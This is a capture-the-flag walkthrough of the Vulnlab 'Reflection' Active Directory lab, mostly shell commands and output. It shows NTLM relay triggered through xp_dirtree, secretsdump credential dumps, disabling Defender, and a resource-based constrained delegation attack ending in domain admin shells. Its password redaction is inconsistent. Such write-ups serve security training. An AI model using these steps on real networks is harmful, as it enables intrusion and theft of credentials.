vulnlab-reflection

vulnlab-reflection

Reflection is a medium Active Directory chain which consists of three machines, MS01, WS01 and DC01 , from MS01, MSSQL staging credentials were found from smb share, which lead to relaying the NTLM hash on DC01’s smb shares, where the service account had access to the prod share containing credentials for production database, from where we’ll get two domain credentials, abbie.smith having GenericAll on MS01 through which can read the LAPS password and further dumping the Georgia.Price password from credential vault, this user also had GenericAll on WS01, having the full access on MS01, we can perform Resource Based Constrained Delegation (RBCD) and again from dumping we’ll get Rhys.Garner ‘s password, whose password we can reuse on DOM_RGARNER who is a part of domain admin.

Writeup:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec smb ms01.reflection.vl -u 'puck' -p '' --shares

SMB         ms01.reflection.vl 445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         ms01.reflection.vl 445    MS01             [+] reflection.vl\puck: 
SMB         ms01.reflection.vl 445    MS01             [+] Enumerated shares
SMB         ms01.reflection.vl 445    MS01             Share           Permissions     Remark
SMB         ms01.reflection.vl 445    MS01             -----           -----------     ------
SMB         ms01.reflection.vl 445    MS01             ADMIN$                          Remote Admin
SMB         ms01.reflection.vl 445    MS01             C$                              Default share
SMB         ms01.reflection.vl 445    MS01             IPC$            READ            Remote IPC
SMB         ms01.reflection.vl 445    MS01             staging         READ            staging environment
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ smbclient //ms01.reflection.vl/staging      

Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jun  7 19:42:48 2023
  ..                                  D        0  Wed Jun  7 19:41:25 2023
  staging_db.conf                     A       50  Thu Jun  8 13:21:49 2023

        6261245 blocks of size 4096. 1153753 blocks available
smb: \> cat staging_db.conf
cat: command not found
smb: \> get staging_db.conf
getting file \staging_db.conf of size 50 as staging_db.conf (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> 

---

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ cat staging_db.conf 
user=web_staging
password=Washroom510
db=staging   

mssql enum

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-mssqlclient web_staging:Washroom510@ms01.reflection.vl 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (web_staging  guest@master)> enum_users
UserName             RoleName   LoginName   DefDBName   DefSchemaName       UserID     SID   
------------------   --------   ---------   ---------   -------------   ----------   -----   
dbo                  db_owner   sa          master      dbo             b'1         '   b'01'   

guest                public     NULL        NULL        guest           b'2         '   b'00'   

INFORMATION_SCHEMA   public     NULL        NULL        NULL            b'3         '    NULL   

sys                  public     NULL        NULL        NULL            b'4         '    NULL   

SQL (web_staging  guest@master)> enum_db
name      is_trustworthy_on   
-------   -----------------   
master                    0   

tempdb                    0   

model                     0   

msdb                      1   

staging                   0   

SQL (web_staging  guest@master)> use staging;
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: staging
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'staging'.
SQL (web_staging  dbo@staging)>
SQL (web_staging  dbo@staging)> select * from staging.information_schema.tables where table_type=' BASE TABLE'
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
SQL (web_staging  dbo@staging)> select * from staging.information_schema.tables;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
staging         dbo            users        b'BASE TABLE'   

SQL (web_staging  dbo@staging)> select * from users;
id   username   password        
--   --------   -------------   
 1   b'dev01'   b'Initial123'   

 2   b'dev02'   b'Initial123'   

SQL (web_staging  dbo@staging)> 

SQL (web_staging  dbo@staging)> exec xp_dirtree '\\10.8.2.138\share',1,1;
subdirectory   depth   file   
------------   -----   ----   
SQL (web_staging  dbo@staging)> 

john svc_web_staging.hash –wordlist=/usr/share/wordlists/rockyou.txt  -> uncrackable

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-smbserver -smb2support share . 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.203.134,51852)
[*] AUTHENTICATE_MESSAGE (REFLECTION\svc_web_staging,MS01)
[*] User MS01\svc_web_staging authenticated successfully
[*] svc_web_staging::REFLECTION:aaaaaaaaaaaaaaaa:9860ed689f9394465837459e3b9ca171:01010000000000008009d71aedd8da0162c1605a968cd3de0000000001001000440075004800720044004e0043006e0003001000440075004800720044004e0043006e000200100072004b004300650052005000510056000400100072004b00430065005200500051005600070008008009d71aedd8da01060004000200000008003000300000000000000000000000003000006e4f54e6fef72023740b6b479ac0125f4ea3738055309f9f716c05e474303f3d0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] Closing down connection (10.10.203.134,51852)
[*] Remaining connections []

Next we do a NTLMrelay attack to dc01.reflection.vl

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.203.133 -i
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.10.203.134, attacking target smb://10.10.203.133
[*] Authenticating against smb://10.10.203.133 as REFLECTION/SVC_WEB_STAGING SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
[*] SMBD-Thread-6 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-8 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-9 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-11 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-12 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-13 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!

We trigger it from our sqlshell

SQL (web_staging  dbo@staging)> exec xp_dirtree '\\10.8.2.138\share',1,1;
subdirectory   depth   file   
------------   -----   ----   
SQL (web_staging  dbo@staging)> 

and in another terminal window on my kali box

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ nc 127.0.0.1 11000                     
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
prod
SYSVOL
# use prod
# ls
drw-rw-rw-          0  Wed Jun  7 19:44:26 2023 .
drw-rw-rw-          0  Wed Jun  7 19:43:22 2023 ..
-rw-rw-rw-         45  Thu Jun  8 13:24:39 2023 prod_db.conf
# get prod_db.conf
# 

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ cat prod_db.conf 
user=web_prod
password=Tr<redacted>01
db=prod

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec mssql dc01.reflection.vl -u names.txt -p 'Tr<redacted>01' --local-auth --continue-on-success
MSSQL       dc01.reflection.vl 1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:DC01)
MSSQL       dc01.reflection.vl 1433   DC01             [+] web_prod:Tribesman201 
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'web_staging'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Administrator'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Guest'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user ''.

sqsh to dc01.reflection.vl

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ sqsh -S 10.10.203.133 -U 'web_prod' -P 'Tr<redacted>01'

sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> use prod;
2> go
1> select * from users;
2> go -m vert
id:       1
name:     abbie.smith
password: CM<redacted>Ew
 
id:       2
name:     dorothy.rose
password: hC<redacted>SJ
 
(2 rows affected)

ldap search

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ ldapsearch -H ldap://dc01.reflection.vl -U abbie.smith -w 'CM<redacted>Ew' -b 'DC=reflection,DC=vl' "(objectClass=user)" "*" | grep sAMAccountName | cut -d " " -f 2 > domainUsers.txt
SASL/DIGEST-MD5 authentication started
SASL username: abbie.smith
SASL SSF: 128
SASL data security layer installed.

bloodhound

bloodhound-python -d reflection.vl -c all -u 'abbie.smith' -p 'CM<redacted>Ew' -ns 10.10.203.133 --dns-tcp

check machine quota

──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec ldap dc01.reflection.vl -u "dorothy.rose" -p "hC<redacted>SJ" -M maq
SMB         dc01.reflection.vl 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
LDAP        dc01.reflection.vl 389    DC01             [+] reflection.vl\dorothy.rose:hC_fny3OK9glSJ 
MAQ         dc01.reflection.vl 389    DC01             [*] Getting the MachineAccountQuota
MAQ         dc01.reflection.vl 389    DC01             MachineAccountQuota: 0

check LAPS

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec ldap dc01.reflection.vl -u "abbie.smith" -p "CM<redacted>Ew" -M laps 
SMB         DC01            445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
LDAP        DC01            389    DC01             [+] reflection.vl\abbie.smith:CMe1x+nlRaaWEw 
LAPS        DC01            389    DC01             [*] Getting LAPS Passwords
LAPS        DC01            389    DC01             Computer: MS01$                Password: H44<redacted>}xi

check pasword used users on ws01.reflection.vl

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec smb ws01.reflection.vl -u domainUsers.txt -p "H447<redacted>}xi" --continue-on-success --local-auth
SMB         ws01.reflection.vl 445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB         ws01.reflection.vl 445    MS01             [+] MS01\Administrator:H4<redacted>xi (Pwn3d!)
SMB         ws01.reflection.vl 445    MS01             [-] MS01\Guest:H4*xi STATUS_LOGON_FAILURE 
SMB         ws01.reflection.vl 445    MS01             [-] MS01\labadm:H4*xi STATUS_LOGON_FAILURE 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\DC01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\krbtgt:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\MS01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\WS01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] 

Do a secretsdump

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump 'ms01/administrator:H4<redacted>xi@ws01.reflection.vl' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:38<redacted>9a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/svc_web_staging:$DCC2$10240#svc_web_staging#6123c7b97697564e016b797de99025dd: (2023-06-07 19:08:01)
REFLECTION.VL/Administrator:$DCC2$10240#Administrator#10c8403d0d68c47754170bf825ffbe9d: (2023-06-07 19:11:08)
REFLECTION.VL/Georgia.Price:$DCC2$10240#Georgia.Price#f20a83b9452ce1c17cf4a57c2b05f7ec: (2024-07-18 08:18:23)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\MS01$:aes256-cts-hmac-sha1-96:f8f1905251e52be2e3c280efa37d6595579baa14e7e22dcdc776e76cc08fbf72
REFLECTION\MS01$:aes128-cts-hmac-sha1-96:b5572db5a79c069d564c0da3a7543ea0
REFLECTION\MS01$:des-cbc-md5:04340497ef8c2a31
REFLECTION\MS01$:plain_password_hex:58dc1407b76528658a71020f1bf3d26064f983ffb68ceaf6bf9781a33691791f5bb668717a5f094f71569c6b7ec629d2de911675b1d9105ebfb4fc23685385d364c0314354dadf9ed521b11413d19736edde2de06ab91c18032498f613bafa4be0dda4e394e0af1c9fca8210462ab2108331bfdfe3995f1812bc0973e63da4e3487260b5dd118ef0289e952c94b60687858a13dd81a5316984af040d66409529b44c1bf0873747f2a27ee115eba71811d33b1bdd12fcf8978ae91239e9b22c026aac009f81f5bdd44a7fb9e491af455014bf4e99cd9cc0ddab2eb5bf243eb6f578e62eb542fb9751907a6bf581d535dc
REFLECTION\MS01$:aad3b435b51404eeaad3b435b51404ee:076ebd94d605cdbf46f0bae7f55d62dc:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb7ad02ee5577322cc2a2e096b7bab17101a4f9a7
dpapi_userkey:0x9de553e3a73ece7cff322d722fc9fbdfe4fd78cc
[*] NL$KM 
 0000   C0 BE 31 EA 49 A4 51 79  67 62 D2 F1 C2 22 1C BE   ..1.I.Qygb..."..
 0010   CE 86 94 CF D5 32 5D 73  32 64 85 4C 37 81 7B AE   .....2]s2d.L7.{.
 0020   0C D1 61 83 A3 65 91 58  D6 F0 B3 17 47 5F 64 93   ..a..e.X....G_d.
 0030   A4 AC D7 4F E7 E4 A5 EE  E8 6D BE 93 7A CF 35 77   ...O.....m..z.5w
NL$KM:c0be31ea49a451796762d2f1c2221cbece8694cfd5325d733264854c37817bae0cd16183a3659158d6f0b317475f6493a4acd74fe7e4a5eee86dbe937acf3577
[*] _SC_MSSQL$SQLEXPRESS 
REFLECTION\svc_web_staging:DivinelyPacifism98
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

We use the admin account to RDP to the Box and start enumerating it

xfreerdp /f /u:administrator /p:'H44<redacted>}xi' /v:ms01.reflection.vl /cert:ignore /rfx 

on MS01 disable defender upload mimikatz.exe , we find :
Georgia.Price
DBl<redacted>id

RBCD attack op ws01.reflection.com ( via ms01 )

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump administrator@ms01.reflection.vl  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password: H44<redacted>xi

[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3819a8ecec5fd33f6ecb83253b24309a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/svc_web_staging:$DCC2$10240#svc_web_staging#6123c7b97697564e016b797de99025dd: (2023-06-07 19:08:01)
REFLECTION.VL/Administrator:$DCC2$10240#Administrator#10c8403d0d68c47754170bf825ffbe9d: (2023-06-07 19:11:08)
REFLECTION.VL/Georgia.Price:$DCC2$10240#Georgia.Price#f20a83b9452ce1c17cf4a57c2b05f7ec: (2024-07-19 09:43:54)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\MS01$:aes256-cts-hmac-sha1-96:dd7df26c646dc3eab4947b81af5700127a622d4480bf217755f9b9b072f6aa1d
REFLECTION\MS01$:aes128-cts-hmac-sha1-96:c400497cd92b4b41c6a00b44f287830b
REFLECTION\MS01$:des-cbc-md5:7943755b4f326449
REFLECTION\MS01$:plain_password_hex:37e2dea970915b066f2d2b35806a0f22d10e6335a1fbee73db06f02d679b2dca0ad0a9cf9583bac1f56594df8af7494eba5c7609ddd0ac303af48b4a585f7a618b4596f241b70142d18fa970a0678ff066d41cb3ff4ee3cedf81083c64b2c1925a28fb39fd0d87172f8ae1c86fa23ab6d26068c0ace2cc2a566dae4c1581515af8c7273f5bd181eec8de2f9db0f06a8a2c4f6395d30b5e3872cde5fc21cbc0213bb59f241a3fb3bff601de5cbe893192f64310a564497307f12935a316340625e74441f689489c17fe9e6550426b27890830a261edec4a5005652878a2e47830eec7e5bb5b42772438e100f7f935d755
REFLECTION\MS01$:aad3b435b51404eeaad3b435b51404ee:c1658a71853a7f23f7ff13cd1c7ee10a:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb7ad02ee5577322cc2a2e096b7bab17101a4f9a7
dpapi_userkey:0x9de553e3a73ece7cff322d722fc9fbdfe4fd78cc
[*] NL$KM 
 0000   C0 BE 31 EA 49 A4 51 79  67 62 D2 F1 C2 22 1C BE   ..1.I.Qygb..."..
 0010   CE 86 94 CF D5 32 5D 73  32 64 85 4C 37 81 7B AE   .....2]s2d.L7.{.
 0020   0C D1 61 83 A3 65 91 58  D6 F0 B3 17 47 5F 64 93   ..a..e.X....G_d.
 0030   A4 AC D7 4F E7 E4 A5 EE  E8 6D BE 93 7A CF 35 77   ...O.....m..z.5w
NL$KM:c0be31ea49a451796762d2f1c2221cbece8694cfd5325d733264854c37817bae0cd16183a3659158d6f0b317475f6493a4acd74fe7e4a5eee86dbe937acf3577
[*] _SC_MSSQL$SQLEXPRESS 
REFLECTION\svc_web_staging:DivinelyPacifism98
[*] Cleaning up... 

then

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-rbcd -delegate-to 'ws01$' -dc-ip dc01.reflection.vl -action 'read' reflection.nl/Georgia.Price:'DB<redacted>id'


Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty

then

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-rbcd -action write -delegate-to "WS01$" -delegate-from "MS01$" -dc-ip 10.10.243.69 "Reflection/Georgia.Price:DB<redacted>id" 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] MS01$ can now impersonate users on WS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     MS01$        (S-1-5-21-3375389138-1770791787-1490854311-1104)

then

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-getST -spn 'cifs/WS01.reflection.vl' -impersonate Administrator -dc-ip 10.10.243.69 'Reflection/MS01$' -hashes ':c1658a71853a7f23f7ff13cd1c7ee10a'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_WS01.reflection.vl@REFLECTION.VL.ccache

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ export KRB5CCNAME=Administrator@cifs_WS01.reflection.vl@REFLECTION.VL.ccache  

and a secretsdump to ws01.reflection.com

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump administrator@WS01.reflection.vl -k -no-pass 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x7ed33ac4a19a5ea7635d402e58c0055f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a2<redacted>02:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:236728438532f0f1a57360173bda0575:::
labadm:1001:aad3b435b51404eeaad3b435b51404ee:a29542cb2707bf6d6c1d2c9311b0ff02:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/Rhys.Garner:$DCC2$10240#Rhys.Garner#99152b74dac4cc4b9763240eaa4c0e3d: (2023-06-08 11:17:05)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\WS01$:plain_password_hex:55005c003f00240038003f0036005b004800350078006e007a0056003a004d003600490038003d0042005b005200340067006f006c003000580060007a00430045002600590021004e00780021004800380064004000260046005d0057007a005e005b006600320073002000380076005800310026006e0078006d002a007800530059006400670075002a002800730036003f0062006200240069005b004a005d006e0021006d0020004f0060003e0061006b002600360045004b007300320075006100390069002b007300290062005e0027006c0042004a005c005500600066002f003e002200430041003b004800
REFLECTION\WS01$:aad3b435b51404eeaad3b435b51404ee:b7728f2d275eb4ff1f6e30692b16c7a1:::
[*] DefaultPassword 
reflection.vl\Rhys.Garner:knh1gJ8Xmeq+uP
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xe7b434bbb2fe36946ecafdfab07d4396c039c6e8
dpapi_userkey:0xf772db3cfa86d2d96caf0fc57946c6e7c17511eb
[*] NL$KM 
 0000   DE AA F4 50 81 29 7C 82  0D 6F F2 2D 08 8B A2 7A   ...P.)|..o.-...z
 0010   7D 46 9F 66 C3 8F D4 9A  FA DB D2 9D 56 9A 79 28   }F.f........V.y(
 0020   10 1F 8F 40 B4 EB 04 6F  42 8F 37 02 7E E5 85 93   ...@...oB.7.~...
 0030   00 9C 28 46 DE 39 3F BB  78 90 E7 C8 AB 3A 75 D1   ..(F.9?.x....:u.
NL$KM:deaaf45081297c820d6ff22d088ba27a7d469f66c38fd49afadbd29d569a7928101f8f40b4eb046f428f37027ee58593009c2846de393fbb7890e7c8ab3a75d1
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-atexec administrator@WS01.reflection.vl 'powershell.exe -c "whoami"' -hashes 'aad3b435b51404eeaad3b435b51404ee:a2<redacted>02'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
[*] Creating task \yVNLerVO
[*] Running task \yVNLerVO
[*] Deleting task \yVNLerVO
[*] Attempting to read ADMIN$\Temp\yVNLerVO.tmp
[*] Attempting to read ADMIN$\Temp\yVNLerVO.tmp
nt authority\system

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-atexec administrator@WS01.reflection.vl 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"' -hashes 'aad3b435b51404eeaad3b435b51404ee:a2<redacted>02'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
[*] Creating task \AvHKoFmN
[*] Running task \AvHKoFmN
[*] Deleting task \AvHKoFmN
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-psexec administrator@WS01.reflection.vl -hashes ':a2<redacted>02' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on WS01.reflection.vl.....
[*] Found writable share ADMIN$
[*] Uploading file YQydtkPz.exe
[*] Opening SVCManager on WS01.reflection.vl.....
[*] Creating service dvqZ on WS01.reflection.vl.....
[*] Starting service dvqZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19045.2965]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>    

--
c:\Users\Rhys.Garner\Desktop> type flag.txt
VL{ba<redacted>eb}

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ evil-winrm --ip dc01.reflection.vl -u 'dom_rgarner' -p 'kn<redacted>uP'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\dom_rgarner\Documents> dir
*Evil-WinRM* PS C:\Users\administrator\desktop> dir


    Directory: C:\Users\administrator\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          6/8/2023   4:24 AM             36 flag.txt


*Evil-WinRM* PS C:\Users\administrator\desktop> type flag.txt
VL{05<redacted>17}
*Evil-WinRM* PS C:\Users\administrator\desktop> 

That’s all.

 

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *